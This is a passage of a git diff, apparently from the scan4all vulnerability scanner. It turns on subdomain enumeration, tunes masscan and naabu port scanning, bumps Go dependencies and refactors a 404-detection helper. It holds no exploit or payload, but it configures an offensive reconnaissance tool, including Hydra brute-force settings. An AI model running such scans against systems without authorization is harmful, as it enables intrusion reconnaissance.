diff --git a/config/config.json b/config/config.json index b324509ad..6326b4b7c 100644 --- a/config/config.json +++ b/config/config.json @@ -66,13 +66,13 @@ "HydraUser": "", "HydraPass": "", "UrlPrecise": true, - "ParseSSl": false, - "EnableSubfinder": false, + "ParseSSl": true, + "EnableSubfinder": true, "EnableHoneyportDetection": true, - "EnableKsubdomain": false, + "EnableKsubdomain": true, "KsubdomainRegxp": "([0-9a-zA-Z\\-]+\\.[0-9a-zA-Z\\-]+)$", "naabu_dns": {}, - "naabu": {"TopPorts": "1000","ScanAllIPS": true,"Threads": 50,"EnableProgressBar": false}, + "naabu": {"TopPorts": "http","ScanAllIPS": true,"Threads": 50,"EnableProgressBar": false}, "priorityNmap": true, "noScan": false, "enableMultNuclei": false, diff --git a/config/doNmapScan.sh b/config/doNmapScan.sh index 29ed9234c..8f1ce93cf 100755 --- a/config/doNmapScan.sh +++ b/config/doNmapScan.sh @@ -1,5 +1,5 @@ #!/bin/bash -XRate=5000 +XRate=2000 function doMasScan { if [[ -f $1 ]] ; then # -F --top-ports=65535 diff --git a/config/scan4all_db.db b/config/scan4all_db.db index 65193fa2c..08d53340b 100644 Binary files a/config/scan4all_db.db and b/config/scan4all_db.db differ diff --git a/go.mod b/go.mod index b35bc4253..6fde24301 100644 --- a/go.mod +++ b/go.mod @@ -100,8 +100,8 @@ require ( github.com/google/go-github v17.0.0+incompatible github.com/gorilla/websocket v1.5.0 github.com/gosnmp/gosnmp v1.35.0 - github.com/hktalent/PipelineHttp v0.0.0-20221007051907-72402204b668 - github.com/hktalent/goSqlite_gorm v1.1.3 + github.com/hktalent/PipelineHttp v0.0.0-20221013012646-f1b33c0f6f66 + github.com/hktalent/goSqlite_gorm v1.1.4 github.com/hktalent/jarm-go v0.0.0-20220918133110-7801447b6267 github.com/huin/asn1ber v0.0.0-20120622192748-af09f62e6358 github.com/icodeface/tls v0.0.0-20190904083142-17aec93c60e5 @@ -154,8 +154,10 @@ require ( github.com/alecthomas/jsonschema v0.0.0-20220216202328-9eeeec9d044b // indirect github.com/alecthomas/template v0.0.0-20190718012654-fb15b899a751 // indirect github.com/alecthomas/units v0.0.0-20211218093645-b94a6e3cc137 // indirect + github.com/andybalholm/brotli v1.0.4 // indirect github.com/andybalholm/cascadia v1.3.1 // indirect github.com/andygrunwald/go-jira v1.16.0 // indirect + github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be // indirect github.com/antchfx/xpath v1.2.1 // indirect github.com/antlr/antlr4/runtime/Go/antlr v1.4.10 // indirect github.com/aws/aws-sdk-go v1.44.113 // indirect @@ -172,19 +174,26 @@ require ( github.com/cockroachdb/redact v1.1.3 // indirect github.com/coreos/etcd v3.3.10+incompatible // indirect github.com/cpuguy83/go-md2man/v2 v2.0.2 // indirect + github.com/creack/pty v1.1.18 // indirect github.com/deckarep/golang-set v1.8.0 // indirect github.com/dgraph-io/ristretto v0.1.0 // indirect + github.com/dgrijalva/jwt-go v3.2.0+incompatible // indirect github.com/dimchansky/utfbom v1.1.1 // indirect github.com/docker/go-units v0.5.0 // indirect github.com/dsnet/compress v0.0.1 // indirect + github.com/dustin/go-broadcast v0.0.0-20211018055107-71439988bd91 // indirect github.com/dustin/go-humanize v1.0.0 // indirect + github.com/elastic/go-elasticsearch/v7 v7.17.1 // indirect github.com/emersion/go-textwrapper v0.0.0-20200911093747-65d896831594 // indirect github.com/fatih/structs v1.1.0 // indirect github.com/fortytw2/leaktest v1.3.0 // indirect github.com/fsnotify/fsnotify v1.5.4 // indirect github.com/getsentry/sentry-go v0.13.0 // indirect + github.com/gin-contrib/gzip v0.0.5 // indirect github.com/gin-contrib/sse v0.1.0 // indirect + github.com/gin-contrib/static v0.0.1 // indirect github.com/gin-gonic/gin v1.8.1 // indirect + github.com/gliderlabs/ssh v0.3.4 // indirect github.com/go-ole/go-ole v1.2.6 // indirect github.com/go-playground/locales v0.14.0 // indirect github.com/go-playground/universal-translator v0.18.0 // indirect @@ -222,6 +231,7 @@ require ( github.com/hashicorp/hcl v1.0.0 // indirect github.com/hdm/jarm-go v0.0.7 // indirect github.com/hktalent/go-utils v0.0.0-20221004095234-2e23f13b429d // indirect + github.com/hktalent/go4Hacker v0.0.0-20220610050413-bb38dc39c4b9 // indirect github.com/hktalent/websocket v0.0.0-20220908204337-b4a81b861976 // indirect github.com/iancoleman/orderedmap v0.2.0 // indirect github.com/itchyny/gojq v0.12.9 // indirect @@ -249,6 +259,7 @@ require ( github.com/mackerelio/go-osstat v0.2.3 // indirect github.com/magiconair/properties v1.8.6 // indirect github.com/mailru/easyjson v0.7.7 // indirect + github.com/manucorporat/stats v0.0.0-20180402194714-3ba42d56d227 // indirect github.com/marten-seemann/qpack v0.2.1 // indirect github.com/marten-seemann/qtls-go1-18 v0.1.2 // indirect github.com/marten-seemann/qtls-go1-19 v0.1.0 // indirect @@ -278,6 +289,7 @@ require ( github.com/projectdiscovery/tlsx v0.0.8 // indirect github.com/projectdiscovery/yamldoc-go v1.0.3-0.20211126104922-00d2c6bb43b6 // indirect github.com/rivo/uniseg v0.4.2 // indirect + github.com/robfig/cron v1.2.0 // indirect github.com/rogpeppe/go-internal v1.9.0 // indirect github.com/russross/blackfriday/v2 v2.1.0 // indirect github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca // indirect @@ -300,6 +312,7 @@ require ( github.com/ugorji/go/codec v1.2.7 // indirect github.com/ulikunitz/xz v0.5.10 // indirect github.com/ulule/deepcopier v0.0.0-20200430083143-45decc6639b6 // indirect + github.com/unrolled/secure v1.10.0 // indirect github.com/valyala/bytebufferpool v1.0.0 // indirect github.com/valyala/fasttemplate v1.2.1 // indirect github.com/weppos/publicsuffix-go v0.20.0 // indirect diff --git a/go.sum b/go.sum index 252e1109a..1eee002e3 100644 --- a/go.sum +++ b/go.sum @@ -102,6 +102,8 @@ github.com/ammario/ipisp/v2 v2.0.0 h1:/aRMp5srZViiBfOUGzl/Esqae4s0MDDzm9buhGcZ0X github.com/ammario/ipisp/v2 v2.0.0/go.mod h1:bQ6KAL5LnYYEj6olUn+Bzv/im/4Esa5oGkbv9b+uOjo= github.com/andres-erbsen/clock v0.0.0-20160526145045-9e14626cd129 h1:MzBOUgng9orim59UnfUTLRjMpd09C5uEVQ6RPGeCaVI= github.com/andres-erbsen/clock v0.0.0-20160526145045-9e14626cd129/go.mod h1:rFgpPQZYZ8vdbc+48xibu8ALc3yeyd64IhHS+PU6Yyg= +github.com/andybalholm/brotli v1.0.4 h1:V7DdXeJtZscaqfNuAdSRuRFzuiKlHSC/Zh3zl9qY3JY= +github.com/andybalholm/brotli v1.0.4/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= github.com/andybalholm/cascadia v1.1.0/go.mod h1:GsXiBklL0woXo1j/WYWtSYYC4ouU9PqHO0sqidkEA4Y= github.com/andybalholm/cascadia v1.3.1 h1:nhxRkql1kdYCc8Snf7D5/D3spOX+dBgjA6u8x004T2c= github.com/andybalholm/cascadia v1.3.1/go.mod h1:R4bJ1UQfqADjvDa4P6HZHLh/3OxWWEqc0Sk8XGwHqvA= @@ -109,6 +111,8 @@ github.com/andygrunwald/go-jira v1.14.0/go.mod h1:KMo2f4DgMZA1C9FdImuLc04x4WQhn5 github.com/andygrunwald/go-jira v1.15.1/go.mod h1:GIYN1sHOIsENWUZ7B4pDeT/nxEtrZpE8l0987O67ZR8= github.com/andygrunwald/go-jira v1.16.0 h1:PU7C7Fkk5L96JvPc6vDVIrd99vdPnYudHu4ju2c2ikQ= github.com/andygrunwald/go-jira v1.16.0/go.mod h1:UQH4IBVxIYWbgagc0LF/k9FRs9xjIiQ8hIcC6HfLwFU= +github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be h1:9AeTilPcZAjCFIImctFaOjnTIavg87rW78vTPkQqLI8= +github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be/go.mod h1:ySMOLuWl6zY27l47sB3qLNK6tF2fkHG55UZxx8oIVo4= github.com/antchfx/htmlquery v1.2.3/go.mod h1:B0ABL+F5irhhMWg54ymEZinzMSi0Kt3I2if0BLYa3V0= github.com/antchfx/htmlquery v1.2.5 h1:1lXnx46/1wtv1E/kzmH8vrfMuUKYgkdDBA9pIdMJnk4= github.com/antchfx/htmlquery v1.2.5/go.mod h1:2MCVBzYVafPBmKbrmwB9F5xdd+IEgRY61ci2oOsOQVw= @@ -219,6 +223,8 @@ github.com/cpuguy83/go-md2man/v2 v2.0.0/go.mod h1:maD7wRr/U5Z6m/iR4s+kqSMx2CaBsr github.com/cpuguy83/go-md2man/v2 v2.0.2 h1:p1EgwI/C7NhT0JmVkwCD2ZBK8j4aeHQX2pMHHBfMQ6w= github.com/cpuguy83/go-md2man/v2 v2.0.2/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o= github.com/creack/pty v1.1.9/go.mod h1:oKZEueFk5CKHvIhNR5MUki03XCEU+Q6VDXinZuGJ33E= +github.com/creack/pty v1.1.18 h1:n56/Zwd5o6whRC5PMGretI4IdRLlmBXYNjScPaBgsbY= +github.com/creack/pty v1.1.18/go.mod h1:MOBLtS5ELjhRRrroQr9kyvTxUAFNvYEK993ew/Vr4O4= github.com/dave/dst v0.26.2/go.mod h1:UMDJuIRPfyUCC78eFuB+SV/WI8oDeyFDvM/JR6NI3IU= github.com/dave/gopackages v0.0.0-20170318123100-46e7023ec56e/go.mod h1:i00+b/gKdIDIxuLDFob7ustLAVqhsZRk2qVZrArELGQ= github.com/dave/jennifer v1.2.0/go.mod h1:fIb+770HOpJ2fmN9EPPKOqm1vMGhB+TwXKMZhrIygKg= @@ -239,6 +245,7 @@ github.com/dgraph-io/ristretto v0.0.2/go.mod h1:KPxhHT9ZxKefz+PCeOGsrHpl1qZ7i70d github.com/dgraph-io/ristretto v0.0.3/go.mod h1:KPxhHT9ZxKefz+PCeOGsrHpl1qZ7i70dGTu2u+Ahh6E= github.com/dgraph-io/ristretto v0.1.0 h1:Jv3CGQHp9OjuMBSne1485aDpUkTKEcUqF+jm/LuerPI= github.com/dgraph-io/ristretto v0.1.0/go.mod h1:fux0lOrBhrVCJd3lcTHsIJhq1T2rokOu6v9Vcb3Q9ug= +github.com/dgrijalva/jwt-go v3.2.0+incompatible h1:7qlOGliEKZXTDg6OTjfoBKDXWrumCAMpl/TFQ4/5kLM= github.com/dgrijalva/jwt-go v3.2.0+incompatible/go.mod h1:E3ru+11k8xSBh+hMPgOLZmtrrCbhqsmaPHjLKYnJCaQ= github.com/dgryski/go-farm v0.0.0-20190423205320-6a90982ecee2/go.mod h1:SqUrOPUnsFjfmXRMNPybcSiG0BgUW2AuFH8PAnS2iTw= github.com/dgryski/go-farm v0.0.0-20200201041132-a6ae2369ad13 h1:fAjc9m62+UWV/WAFKLNi6ZS0675eEUC9y3AlwSbQu1Y= @@ -254,10 +261,14 @@ github.com/docker/go-units v0.5.0/go.mod h1:fgPhTUdO+D/Jk86RDLlptpiXQzgHJF7gydDD github.com/dsnet/compress v0.0.1 h1:PlZu0n3Tuv04TzpfPbrnI0HW/YwodEXDS+oPKahKF0Q= github.com/dsnet/compress v0.0.1/go.mod h1:Aw8dCMJ7RioblQeTqt88akK31OvO8Dhf5JflhBbQEHo= github.com/dsnet/golib v0.0.0-20171103203638-1ea166775780/go.mod h1:Lj+Z9rebOhdfkVLjJ8T6VcRQv3SXugXy999NBtR9aFY= +github.com/dustin/go-broadcast v0.0.0-20211018055107-71439988bd91 h1:jAUM3D1KIrJmwx60DKB+a/qqM69yHnu6otDGVa2t0vs= +github.com/dustin/go-broadcast v0.0.0-20211018055107-71439988bd91/go.mod h1:8rK6Kbo1Jd6sK22b24aPVgAm3jlNy1q1ft+lBALdIqA= github.com/dustin/go-humanize v1.0.0 h1:VSnTsYCnlFHaM2/igO1h6X3HA71jcobQuxemgkq4zYo= github.com/dustin/go-humanize v1.0.0/go.mod h1:HtrtbFcZ19U5GC7JDqmcUSB87Iq5E25KnS6fMYU6eOk= github.com/eggsampler/acme/v3 v3.2.1/go.mod h1:/qh0rKC/Dh7Jj+p4So7DbWmFNzC4dpcpK53r226Fhuo= github.com/eknkc/amber v0.0.0-20171010120322-cdade1c07385/go.mod h1:0vRUJqYpeSZifjYj7uP3BG/gKcuzL9xWVV/Y+cK33KM= +github.com/elastic/go-elasticsearch/v7 v7.17.1 h1:49mHcHx7lpCL8cW1aioEwSEVKQF3s+Igi4Ye/QTWwmk= +github.com/elastic/go-elasticsearch/v7 v7.17.1/go.mod h1:OJ4wdbtDNk5g503kvlHLyErCgQwwzmDtaFC4XyOxXA4= github.com/emersion/go-message v0.16.0 h1:uZLz8ClLv3V5fSFF/fFdW9jXjrZkXIpE1Fn8fKx7pO4= github.com/emersion/go-message v0.16.0/go.mod h1:pDJDgf/xeUIF+eicT6B/hPX/ZbEorKkUMPOxrPVG2eQ= github.com/emersion/go-textwrapper v0.0.0-20200911093747-65d896831594 h1:IbFBtwoTQyw0fIM5xv1HF+Y+3ZijDR839WMulgxCcUY= @@ -290,12 +301,20 @@ github.com/getsentry/sentry-go v0.12.0/go.mod h1:NSap0JBYWzHND8oMbyi0+XZhUalc1TB github.com/getsentry/sentry-go v0.13.0 h1:20dgTiUSfxRB/EhMPtxcL9ZEbM1ZdR+W/7f7NWD+xWo= github.com/getsentry/sentry-go v0.13.0/go.mod h1:EOsfu5ZdvKPfeHYV6pTVQnsjfp30+XA7//UooKNumH0= github.com/ghemawat/stream v0.0.0-20171120220530-696b145b53b9/go.mod h1:106OIgooyS7OzLDOpUGgm9fA3bQENb/cFSyyBmMoJDs= +github.com/gin-contrib/gzip v0.0.5 h1:mhnVU32YnnBh2LPH2iqRqsA/eR7SAqRaD388jL2s/j0= +github.com/gin-contrib/gzip v0.0.5/go.mod h1:OPIK6HR0Um2vNmBUTlayD7qle4yVVRZT0PyhdUigrKk= github.com/gin-contrib/sse v0.0.0-20190301062529-5545eab6dad3/go.mod h1:VJ0WA2NBN22VlZ2dKZQPAPnyWw5XTlK1KymzLKsr59s= github.com/gin-contrib/sse v0.1.0 h1:Y/yl/+YNO8GZSjAhjMsSuLt29uWRFHdHYUb5lYOV9qE= github.com/gin-contrib/sse v0.1.0/go.mod h1:RHrZQHXnP2xjPF+u1gW/2HnVO7nvIa9PG3Gm+fLHvGI= +github.com/gin-contrib/static v0.0.1 h1:JVxuvHPuUfkoul12N7dtQw7KRn/pSMq7Ue1Va9Swm1U= +github.com/gin-contrib/static v0.0.1/go.mod h1:CSxeF+wep05e0kCOsqWdAWbSszmc31zTIbD8TvWl7Hs= github.com/gin-gonic/gin v1.4.0/go.mod h1:OW2EZn3DO8Ln9oIKOvM++LBO+5UPHJJDH72/q/3rZdM= +github.com/gin-gonic/gin v1.6.3/go.mod h1:75u5sXoLsGZoRN5Sgbi1eraJ4GU3++wFwWzhwvtwp4M= +github.com/gin-gonic/gin v1.7.4/go.mod h1:jD2toBW3GZUr5UMcdrwQA10I7RuaFOl/SGeDjXkfUtY= github.com/gin-gonic/gin v1.8.1 h1:4+fr/el88TOO3ewCmQr8cx/CtZ/umlIRIs5M4NTNjf8= github.com/gin-gonic/gin v1.8.1/go.mod h1:ji8BvRH1azfM+SYow9zQ6SZMvR8qOMZHmsCuWR9tTTk= +github.com/gliderlabs/ssh v0.3.4 h1:+AXBtim7MTKaLVPgvE+3mhewYRawNLTd+jEEz/wExZw= +github.com/gliderlabs/ssh v0.3.4/go.mod h1:ZSS+CUoKHDrqVakTfTWUlKSr9MtMFkC4UvtQKD7O914= github.com/go-check/check v0.0.0-20180628173108-788fd7840127/go.mod h1:9ES+weclKsC9YodN5RgxqK/VD9HM9JsCSh7rNhMZE98= github.com/go-errors/errors v1.0.1 h1:LUHzmkK3GUKUrL/1gfBUxAHzcev3apQlezX/+O7ma6w= github.com/go-errors/errors v1.0.1/go.mod h1:f4zRHt4oKfwPJE5k8C9vpYG+aDHdBFUsgrm6/TyX73Q= @@ -309,10 +328,14 @@ github.com/go-ole/go-ole v1.2.6 h1:/Fpf6oFPoeFik9ty7siob0G6Ke8QvQEuVcuChpwXzpY= github.com/go-ole/go-ole v1.2.6/go.mod h1:pprOEPIfldk/42T2oK7lQ4v4JSDwmV0As9GaiUsvbm0= github.com/go-playground/assert/v2 v2.0.1 h1:MsBgLAaY856+nPRTKrp3/OZK38U/wa0CcBYNjji3q3A= github.com/go-playground/assert/v2 v2.0.1/go.mod h1:VDjEfimB/XKnb+ZQfWdccd7VUvScMdVu0Titje2rxJ4= +github.com/go-playground/locales v0.13.0/go.mod h1:taPMhCMXrRLJO55olJkUXHZBHCxTMfnGwq/HNwmWNS8= github.com/go-playground/locales v0.14.0 h1:u50s323jtVGugKlcYeyzC0etD1HifMjqmJqb8WugfUU= github.com/go-playground/locales v0.14.0/go.mod h1:sawfccIbzZTqEDETgFXqTho0QybSa7l++s0DH+LDiLs= +github.com/go-playground/universal-translator v0.17.0/go.mod h1:UkSxE5sNxxRwHyU+Scu5vgOQjsIJAF8j9muTVoKLVtA= github.com/go-playground/universal-translator v0.18.0 h1:82dyy6p4OuJq4/CByFNOn/jYrnRPArHwAcmLoJZxyho= github.com/go-playground/universal-translator v0.18.0/go.mod h1:UvRDBj+xPUEGrFYl+lu/H90nyDXpg0fqeB/AQUGNTVA= +github.com/go-playground/validator/v10 v10.2.0/go.mod h1:uOYAAleCW8F/7oMFd6aG0GOhaH6EGOAJShg8Id5JGkI= +github.com/go-playground/validator/v10 v10.4.1/go.mod h1:nlOn6nFhuKACm19sB/8EGNn9GlaMV7XkbRSipzJ0Ii4= github.com/go-playground/validator/v10 v10.11.0/go.mod h1:i+3WkQ1FvaUjjxh1kSvIA4dMGDBiPU55YFDl0WbKdWU= github.com/go-playground/validator/v10 v10.11.1 h1:prmOlTVv+YjZjmRmNSF3VmspqJIxJWXmqUsHwfTRRkQ= github.com/go-playground/validator/v10 v10.11.1/go.mod h1:i+3WkQ1FvaUjjxh1kSvIA4dMGDBiPU55YFDl0WbKdWU= @@ -516,10 +539,16 @@ github.com/hdm/jarm-go v0.0.7 h1:Eq0geenHrBSYuKrdVhrBdMMzOmA+CAMLzN2WrF3eL6A= github.com/hdm/jarm-go v0.0.7/go.mod h1:kinGoS0+Sdn1Rr54OtanET5E5n7AlD6T6CrJAKDjJSQ= github.com/hktalent/PipelineHttp v0.0.0-20221007051907-72402204b668 h1:10csPasxwFPuL0dV/8Wut1SVmBmEiY4VB77QOFW50KE= github.com/hktalent/PipelineHttp v0.0.0-20221007051907-72402204b668/go.mod h1:ncw1+ugTc5GPQLUHHI7uWrgW2KWBppDBWwwjC984QJg= +github.com/hktalent/PipelineHttp v0.0.0-20221013012646-f1b33c0f6f66 h1:D/PD14cl6K/udXTn1IQ25obI6bjRr+fmxeVnHOQGYlg= +github.com/hktalent/PipelineHttp v0.0.0-20221013012646-f1b33c0f6f66/go.mod h1:ncw1+ugTc5GPQLUHHI7uWrgW2KWBppDBWwwjC984QJg= github.com/hktalent/go-utils v0.0.0-20221004095234-2e23f13b429d h1:z1IUP4hqn0LGgs78bU2gSlna92/p+RlB0MSZ+RxSmCo= github.com/hktalent/go-utils v0.0.0-20221004095234-2e23f13b429d/go.mod h1:Du0lF0ZtTONXpWydjmnsL71He+zlimYLmTmAZta19ZA= +github.com/hktalent/go4Hacker v0.0.0-20220610050413-bb38dc39c4b9 h1:OAnRWLddVE6FPOeIHJcgDYWoQWpvh/F5w/1MEJikWIQ= +github.com/hktalent/go4Hacker v0.0.0-20220610050413-bb38dc39c4b9/go.mod h1:Mp15ofPLpEzvJUl8BR7ctBhp0lf2xL5Nr76xwlTfj9M= github.com/hktalent/goSqlite_gorm v1.1.3 h1:PZNdM8/w4thzlpOhpFW4Qqytaf/0RF19aiTyA3H1HG0= github.com/hktalent/goSqlite_gorm v1.1.3/go.mod h1:GnAPG+EfWVn/pI2mVz+r43cE/l6Suu647I5Hvo/kGmc= +github.com/hktalent/goSqlite_gorm v1.1.4 h1:36uSmVMqIGacIdqZpGWBXgovdnlloWRFl0DdnRVtxok= +github.com/hktalent/goSqlite_gorm v1.1.4/go.mod h1:qpfsbYRX1f6JSTlxG7WLuoLLzmfVjhAHdBxo2g0/oAs= github.com/hktalent/jarm-go v0.0.0-20220918133110-7801447b6267 h1:eH9QDUO5zwn34BLweSdpTdNcxHD/GXxxLDEG7gaR4OQ= github.com/hktalent/jarm-go v0.0.0-20220918133110-7801447b6267/go.mod h1:4r72GiZnJx4nyoKOHbzu0/5NCuY01Yekue5zueaYUcs= github.com/hktalent/websocket v0.0.0-20220908204337-b4a81b861976 h1:oGE7u0adRuzpamtAkkOy65hevwyEtrszTAVz+USJz/k= @@ -657,6 +686,7 @@ github.com/labstack/gommon v0.3.0/go.mod h1:MULnywXg0yavhxWKc+lOruYdAhDwPK9wf0OL github.com/lcvvvv/gonmap v1.2.1 h1:Itbo0mnH45X9HBdzjn92e0ZTaBbBdfyfxWY21uGUAw8= github.com/lcvvvv/gonmap v1.2.1/go.mod h1:USOReUnvvGX9/3h8arU3c6ViJ0dCilM+bTwJWQI4e0A= github.com/ledongthuc/pdf v0.0.0-20220302134840-0c2507a12d80 h1:6Yzfa6GP0rIo/kULo2bwGEkFvCePZ3qHDDTC3/J9Swo= +github.com/leodido/go-urn v1.2.0/go.mod h1:+8+nEpDfqqsY+g338gtMEUOtuK+4dEMhiQEgxpxOKII= github.com/leodido/go-urn v1.2.1 h1:BqpAaACuzVSgi/VLzGZIobT2z4v53pjosyNd9Yv6n/w= github.com/leodido/go-urn v1.2.1/go.mod h1:zt4jvISO2HfUBqxjfIshjdMTYS56ZS/qv49ictyFfxY= github.com/lib/pq v1.10.7 h1:p7ZhMD+KsSRozJr34udlUrhboJwWAgCg34+/ZZNvZZw= @@ -682,6 +712,8 @@ github.com/magiconair/properties v1.8.6 h1:5ibWZ6iY0NctNGWo87LalDlEZ6R41TqbbDamh github.com/magiconair/properties v1.8.6/go.mod h1:y3VJvCyxH9uVvJTWEGAELF3aiYNyPKd5NZ3oSwXrF60= github.com/mailru/easyjson v0.7.7 h1:UGYAvKxe3sBsEDzO8ZeWOSlIQfWFlxbzLZe7hwFURr0= github.com/mailru/easyjson v0.7.7/go.mod h1:xzfreul335JAWq5oZzymOObrkdz5UnU4kGfJJLY9Nlc= +github.com/manucorporat/stats v0.0.0-20180402194714-3ba42d56d227 h1:KIaAZ/V+/0/6BOULrmBQ9T1ed8BkKqGIjIKW923nJuo= +github.com/manucorporat/stats v0.0.0-20180402194714-3ba42d56d227/go.mod h1:ruMr5t05gVho4tuDv0PbI0Bb8nOxc/5Y6JzRHe/yfA0= github.com/marten-seemann/qpack v0.2.1 h1:jvTsT/HpCn2UZJdP+UUB53FfUUgeOyG5K1ns0OJOGVs= github.com/marten-seemann/qpack v0.2.1/go.mod h1:F7Gl5L1jIgN1D11ucXefiuJS9UMVP2opoCp2jDKb7wc= github.com/marten-seemann/qtls-go1-18 v0.1.2 h1:JH6jmzbduz0ITVQ7ShevK10Av5+jBEKAHMntXmIV7kM= @@ -970,6 +1002,8 @@ github.com/remeh/sizedwaitgroup v1.0.0/go.mod h1:3j2R4OIe/SeS6YDhICBy22RWjJC5eNC github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= github.com/rivo/uniseg v0.4.2 h1:YwD0ulJSJytLpiaWua0sBDusfsCZohxjxzVTYjwxfV8= github.com/rivo/uniseg v0.4.2/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= +github.com/robfig/cron v1.2.0 h1:ZjScXvvxeQ63Dbyxy76Fj3AT3Ut0aKsyd2/tl3DTMuQ= +github.com/robfig/cron v1.2.0/go.mod h1:JGuDeoQd7Z6yL4zQhZ3OPEVHB7fL6Ka6skscFHfmt2k= github.com/rogpeppe/fastuuid v1.1.0/go.mod h1:jVj6XXZzXRy/MSR5jhDC/2q6DgLz+nrA6LYCDYWNEvQ= github.com/rogpeppe/go-internal v1.3.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4= github.com/rogpeppe/go-internal v1.6.1/go.mod h1:xXDCJY+GAPziupqXw64V24skbSoqbTEfhy4qGm1nDQc= @@ -1110,6 +1144,8 @@ github.com/ulikunitz/xz v0.5.10 h1:t92gobL9l3HE202wg3rlk19F6X+JOxl9BBrCCMYEYd8= github.com/ulikunitz/xz v0.5.10/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14= github.com/ulule/deepcopier v0.0.0-20200430083143-45decc6639b6 h1:TtyC78WMafNW8QFfv3TeP3yWNDG+uxNkk9vOrnDu6JA= github.com/ulule/deepcopier v0.0.0-20200430083143-45decc6639b6/go.mod h1:h8272+G2omSmi30fBXiZDMkmHuOgonplfKIKjQWzlfs= +github.com/unrolled/secure v1.10.0 h1:TBNP42z2AB+2pW9PR6vdbqhlQuv1iTeSVzK1qHjOBzA= +github.com/unrolled/secure v1.10.0/go.mod h1:BmF5hyM6tXczk3MpQkFf1hpKSRqCyhqcbiQtiAF7+40= github.com/urfave/cli/v2 v2.0.0/go.mod h1:SE9GqnLQmjVa0iPEY0f1w3ygNIYcIJ0OKPMoW2caLfQ= github.com/urfave/cli/v2 v2.16.3 h1:gHoFIwpPjoyIMbJp/VFd+/vuD0dAgFK4B6DpEMFJfQk= github.com/urfave/cli/v2 v2.16.3/go.mod h1:1CNUng3PtjQMtRzJO4FMXBQvkGtuYRxxiR9xMa7jMwI= @@ -1254,6 +1290,7 @@ golang.org/x/crypto v0.0.0-20201112155050-0c6587e931a9/go.mod h1:LzIPMQfyMNhhGPh golang.org/x/crypto v0.0.0-20201124201722-c8d3bf9c5392/go.mod h1:jdWPYTVW3xRLrWPugEBEK3UY2ZEsg3UU495nc5E+M+I= golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4= golang.org/x/crypto v0.0.0-20210421170649-83a5a9bb288b/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4= +golang.org/x/crypto v0.0.0-20210616213533-5ff15b29337e/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/crypto v0.0.0-20211108221036-ceb1ce70b4fa/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/crypto v0.0.0-20211215153901-e495a2d5b3d3/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= @@ -1462,6 +1499,7 @@ golang.org/x/sys v0.0.0-20210426230700-d19ff857e887/go.mod h1:h1NjWce9XRLGQEsW7w golang.org/x/sys v0.0.0-20210510120138-977fb7262007/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210601080250-7ecdf8ef093b/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20210616094352-59db8d763f22/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210806184541-e5e7981a1069/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210823070655-63515b42dcdf/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= diff --git a/lib/util/config.go b/lib/util/config.go index 5780c62d4..432c8e5b2 100644 --- a/lib/util/config.go +++ b/lib/util/config.go @@ -287,6 +287,7 @@ func doReadBuff(buf *bytes.Buffer) string { // 最佳的方法是将命令写到临时文件,并通过bash进行执行 func DoCmd(args ...string) (string, error) { + log.Println("start run: " + strings.Join(args, " ")) cmd := exec.Command(args[0], args[1:]...) var stdout, stderr bytes.Buffer cmd.Stdout = &stdout // 标准输出 @@ -434,9 +435,15 @@ func GetObjFromNoRpt[T any](key string) T { return x2 } +func TestIs404(szUrl string) (r01 *Response, err error, ok bool) { + r01, err, ok = TestIsWeb01(szUrl) + ok = err == nil && nil != r01 && (404 == r01.StatusCode || 302 == r01.StatusCode) + return r01, err, ok +} + // 绝对404检测 // 相同 url 本实例中只检测一次 -func TestIs404(szUrl string) (r01 *Response, err error, ok bool) { +func TestIsWeb01(szUrl string) (r01 *Response, err error, ok bool) { key := "TestIs404" + szUrl a1 := GetObjFromNoRpt[[]interface{}](key) if nil != a1 { @@ -450,7 +457,15 @@ func TestIs404(szUrl string) (r01 *Response, err error, ok bool) { return r01, err, ok } sz404 := szUrl + Abs404 - //client := GetClient(sz404) + client1 := GetClient(sz404, map[string]interface{}{ + "Timeout": 30 * 60, + "MaxIdleConns": 100, + "MaxIdleConnsPerHost": 2, + "DefaultMaxIdleConnsPerHost": 2, + "MaxConnsPerHost": 0, + }) + PutClientCc(sz404, client1) + //if nil != client { // client.Client.Timeout = 500 // client.ErrCount = 0 @@ -467,10 +482,10 @@ func 